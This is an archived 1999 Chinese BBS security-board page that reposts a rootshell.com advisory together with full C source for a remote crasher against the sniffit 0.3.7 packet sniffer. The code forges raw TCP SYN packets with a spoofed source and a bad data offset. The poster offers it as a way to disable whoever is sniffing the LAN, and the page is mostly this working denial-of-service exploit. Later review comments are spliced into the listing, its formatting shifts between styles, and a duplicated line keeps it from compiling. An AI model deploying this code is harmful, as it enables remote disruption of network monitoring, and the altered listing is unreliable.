<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="317.htm">上一层</a>][<a href="430.htm">下一篇</a>]
<hr><p align="left"><small>发信人: biff (大可), 信区: Security <br>
标 题: crash sniffit <br>
发信站: 武汉白云黄鹤站 (Sun May 16 15:35:41 1999), 站内信件 <br>
sniffit功能很强大,一个局域网的是不是很害怕别人发现你做了什么呢? <br>
好了,现在有办法啦,不过只能针对3.5版本的哦~~ 太可惜了!但是有了这个 <br>
万一有人在偷听,嘿嘿,就有办法啦! <br>
试试吧. <br>
[ http://www.rootshell.com/ ] <br>
From anihilato@famipow.com Wed Feb 17 16:17:12 1999 <br>
Date: Thu, 18 Feb 1999 01:16:31 +0100 <br>
From: "K`\\meleon" <anihilato@famipow.com> <br>
To: submission@rootshell.com <br>
Subject: Sniffit buffer overflow <br>
Hi, <br>
I discovered the last version of sniffit does segfault when receiving a <br>
packet with a data offset > 5, <br>
which means any sniffit can be crashed remotely. <br>
Exploit code follows. <br>
-- <br>
K `\ m e l e o n <br>
email : anihilato@famipow.com <br>
irc : irc.famipow.com (6667) #europe <br>
[ Part 2: "Attached Text" ] <br>
/* Sniffit 0.3.7 (and below) crasher <br>
* <br>
* There is a buffer overflow condition in sniffit when receiving <br>
* a packet with a data offset > 5, thus allowing remote denial of service. <br>
* <br>
* Code follows. <br>
* To compile, kiddies : cc -o scrash scrash.c <br>
* <br>
* K`\meleon (anihilato@famipow.com or irc.famipow.com #europe) <br>
*/ <br>
#include <stdio.h> <br>
#include <netdb.h> <br>
#include <errno.h> <br>
#include <netinet/in.h> <br>
#include <sys/socket.h> <br>
#include <sys/types.h> <br>
#include <linux/socket.h> <br>
#include <linux/ip.h> <br>
#include <linux/tcp.h> <br>
// Sizes of the two kernel header structs; used to size and checksum the hand-built packet. <br>
#define TCPHDR sizeof(struct tcphdr) <br>
#define IPHDR sizeof(struct iphdr) <br>
// NOTE(review): PACKETSIZE expands to an unparenthesized sum (TCPHDR + IPHDR). It is only <br>
// correct where operator precedence cannot regroup it; as an operand of * or / it would not be. <br>
#define PACKETSIZE TCPHDR + IPHDR <br>
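/*
 * 16-bit ones'-complement checksum over nbytes bytes starting at ptr
 * (the Internet checksum used for the IP and TCP headers in this file).
 *
 * ptr    - start of the data, read as native 16-bit words
 * nbytes - number of bytes to cover; a trailing odd byte is padded with zero
 *
 * Returns the complemented, folded sum. A non-positive nbytes yields 0xffff.
 *
 * The accumulator is unsigned and the carry fold loops until nothing is left
 * above bit 15, so the result does not depend on long being exactly 32 bits
 * and no signed overflow can occur.
 */
unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
    unsigned long sum = 0;
    unsigned short oddbyte;

    /* Add up all complete 16-bit words. */
    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }

    /* One byte left over: place it in the first byte of a zeroed word. */
    if (nbytes == 1) {
        oddbyte = 0;
        *((unsigned char *)&oddbyte) = *(unsigned char *)ptr;
        sum += oddbyte;
    }

    /* Fold every carry above bit 15 back into the low 16 bits. */
    while (sum >> 16) {
        sum = (sum >> 16) + (sum & 0xffff);
    }

    /* Ones' complement, truncated to 16 bits. */
    return (unsigned short)~sum;
}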
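/*
 * Fill *addr (treated as a struct sockaddr_in) with an IPv4 address and port.
 *
 * addr     - destination structure; zeroed before it is filled in
 * hostname - dotted-quad literal or a name to look up with gethostbyname()
 * port     - port in host byte order, stored in network byte order
 *            (unsigned short is the type the u_short typedef names)
 *
 * The literal form is tried first. If the name cannot be resolved either, a
 * message is written to stderr and the address falls back to the fixed
 * placeholder 1.2.3.4. The function reports no error to the caller, so the
 * result must not be assumed to be the host that was asked for.
 *
 * The resolver result is copied only when it is an AF_INET entry whose length
 * matches sin_addr; the original copied h_length bytes unchecked, which could
 * write past the 4-byte address field.
 */
void resolve_address(struct sockaddr * addr, char *hostname, unsigned short port)
{
    struct sockaddr_in *address = (struct sockaddr_in *)addr;
    struct hostent *host;

    if (address == NULL) {
        return;
    }

    (void) bzero((char *)address, sizeof(struct sockaddr_in));
    address->sin_family = AF_INET;
    address->sin_port = htons(port);

    if (hostname != NULL) {
        /* INADDR_NONE is inet_addr()'s failure value (all bits set). */
        address->sin_addr.s_addr = inet_addr(hostname);
        if (address->sin_addr.s_addr != INADDR_NONE) {
            return;
        }

        host = gethostbyname(hostname);
        if (host != NULL
            && host->h_addrtype == AF_INET
            && host->h_addr_list[0] != NULL
            && (size_t)host->h_length == sizeof address->sin_addr) {
            bcopy(host->h_addr_list[0], (char *)&address->sin_addr,
                  sizeof address->sin_addr);
            return;
        }
    }

    fprintf(stderr, "Cannot resolve %s, reverting to default 1.2.3.4\n",
            hostname != NULL ? hostname : "(null)");
    address->sin_addr.s_addr = inet_addr("1.2.3.4");
}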
// sendcrash: fills in one IPv4 header and one TCP header by hand and transmits them <br>
// on a raw socket. argv[1] is resolved into the IP source address and argv[2] into the <br>
// destination; the host parameter is not referenced anywhere in this function. <br>
// Defender's note: the source address is whatever the caller typed, so the saddr seen <br>
// on the wire for a packet like this says nothing reliable about where it came from. <br>
void sendcrash (char *argv[], struct hostent *host) <br>
{ <br>
int sockfd, n; <br>
static struct sockaddr_in local_sin; <br>
static struct sockaddr_in remote_sin; <br>
// Wire image that is handed to sendto(): IP header directly followed by a TCP header, <br>
// with no TCP options and no payload. <br>
struct tpack{ <br>
struct iphdr ip; <br>
struct tcphdr tcp; <br>
}tpack; <br>
// Scratch structure that is only passed to in_cksum() for the TCP checksum; <br>
// it is never passed to sendto(). <br>
struct pseudo_header{ <br>
unsigned source_address; <br>
unsigned dest_address; <br>
unsigned char placeholder; <br>
unsigned char protocol; <br>
unsigned short tcp_length; <br>
struct tcphdr tcp; <br>
}pheader; <br>
// NOTE(review): the repeated "}pheader;" on the next line looks like a duplication <br>
// introduced when the post was archived; the listing does not compile as shown. <br>
}pheader; <br>
// Both addresses are resolved with the same fixed port value. <br>
resolve_address((struct sockaddr *)&local_sin, argv[1], 31337); <br>
resolve_address((struct sockaddr *)&remote_sin, argv[2], 31337); <br>
// TCP header. Every field is a constant (ports 31337, fixed sequence number, SYN only, <br>
// window 0), which makes traffic from this exact tool straightforward to signature. <br>
tpack.tcp.source=htons(31337); <br>
tpack.tcp.dest=htons(31337); <br>
// NOTE(review): ntohl() is used where htonl() would be the conventional direction. <br>
tpack.tcp.seq=ntohl(269167349); <br>
// Data offset is counted in 32-bit words, so 6 declares a TCP header one word longer <br>
// than the fixed struct tcphdr that is actually sent (tot_len and the sendto() length <br>
// below both use TCPHDR only). The header therefore claims bytes the packet does not <br>
// carry. The advisory text above reports that affected sniffit versions crash on any <br>
// data offset > 5. The general defence in a capture tool is to check doff*4 against the <br>
// number of bytes really captured before reading options or payload; for monitoring, <br>
// a segment whose declared header length exceeds the IP payload is malformed on any port. <br>
tpack.tcp.doff=6; // This is it <br>
tpack.tcp.res1=0; <br>
tpack.tcp.res2=0; <br>
tpack.tcp.urg=0; <br>
tpack.tcp.ack=0; <br>
tpack.tcp.psh=0; <br>
tpack.tcp.rst=0; <br>
tpack.tcp.syn=1; <br>
tpack.tcp.fin=0; <br>
tpack.tcp.window=0; <br>
// Checksum field must be zero while the checksum itself is being computed further down. <br>
tpack.tcp.check=0; <br>
tpack.tcp.urg_ptr=0; <br>
// IP header <br>
tpack.ip.version=4; <br>
// ihl=5 words: an IP header without options. <br>
tpack.ip.ihl=5; <br>
tpack.ip.tos=0; <br>
tpack.ip.tot_len=htons(IPHDR+TCPHDR); <br>
tpack.ip.id=htons(2); <br>
tpack.ip.frag_off=0; <br>
tpack.ip.ttl=64; <br>
tpack.ip.protocol=IPPROTO_TCP; <br>
tpack.ip.check=0; <br>
tpack.ip.saddr=local_sin.sin_addr.s_addr; <br>
tpack.ip.daddr=remote_sin.sin_addr.s_addr; <br>
// IP header checksum <br>
tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR); <br>
// TCP header checksum <br>
// Computed over the pseudo-header fields followed by a copy of the TCP header. <br>
pheader.source_address=(unsigned)tpack.ip.saddr; <br>
pheader.dest_address=(unsigned)tpack.ip.daddr; <br>
pheader.placeholder=0; <br>
pheader.protocol=IPPROTO_TCP; <br>
pheader.tcp_length=htons(TCPHDR); <br>
bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR); <br>
// The literal 12 matches the five pseudo-header fields declared above (4+4+1+1+2 bytes), <br>
// assuming the compiler inserts no padding between them. <br>
tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12); <br>
// Raw socket: the program supplies the complete IP header itself. On failure the <br>
// process exits here, before anything is sent. <br>
if ( (sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { <br>
perror("socket"); <br>
exit(1); <br>
} <br>
printf("Discovered and coded by K`\\meleon\n"); <br>
printf("Sending crash...\n"); <br>
// NOTE(review): the sendto() call below is broken across three lines by the archive's <br>
// line wrapping ("si" / "zeof" / "(remote_sin));"); it is a single statement. <br>
n = sendto(sockfd, &tpack, PACKETSIZE, 0, (struct sockaddr *)&remote_sin, si <br>
zeof <br>
(remote_sin)); <br>
// A short or failed send is treated as fatal; the socket is closed before exiting. <br>
if (n != PACKETSIZE) { <br>
perror("Damn, crash packet was not sent properly"); <br>
close(sockfd); <br>
exit(1); <br>
} <br>
printf("CraSh SenT #$!\n"); <br>
close(sockfd); <br>
} <br>
// Entry point: checks privileges and the argument count, confirms that argv[2] resolves, <br>
// then calls sendcrash(). Declared without a return type (implicit int, pre-C99 style) <br>
// and has no return statement. <br>
main(int argc, char *argv[]) <br>
{ <br>
// NOTE(review): i is declared but never used in this function. <br>
int i; <br>
struct hostent *host; <br>
// Exits only when BOTH the real and the effective uid are non-zero; either one being 0 <br>
// lets the program continue. Presumably needed because sendcrash() opens a SOCK_RAW socket. <br>
if ( (getuid() != 0) && (geteuid() != 0) ) { <br>
printf("Sniffit CraSheR\n"); <br>
printf("Discovered and coded by K`\\meleon\n"); <br>
printf("You need to be r00t to run this prog...\n"); <br>
exit(1); <br>
} <br>
// Exactly two arguments are required; anything else prints the usage text and exits. <br>
if (argc != 3 ) { <br>
printf("Sniffit CraSheR\n"); <br>
printf("Discovered and coded by K`\\meleon\n"); <br>
printf("Usage : %s <from host> <victim host>\n", argv[0]); <br>
exit(1); <br>
} <br>
// Only argv[2] is checked for resolvability here; argv[1] is not validated, and <br>
// resolve_address() silently substitutes 1.2.3.4 for a name it cannot resolve. <br>
if ( (host = gethostbyname(argv[2])) == 0) { <br>
herror("Hostname"); <br>
exit(1); <br>
} <br>
// host is passed along, but sendcrash() resolves argv[1] and argv[2] again itself. <br>
sendcrash(argv, host); <br>
} <br>
-- <br>
</small><hr>
</table>
</body>
</html>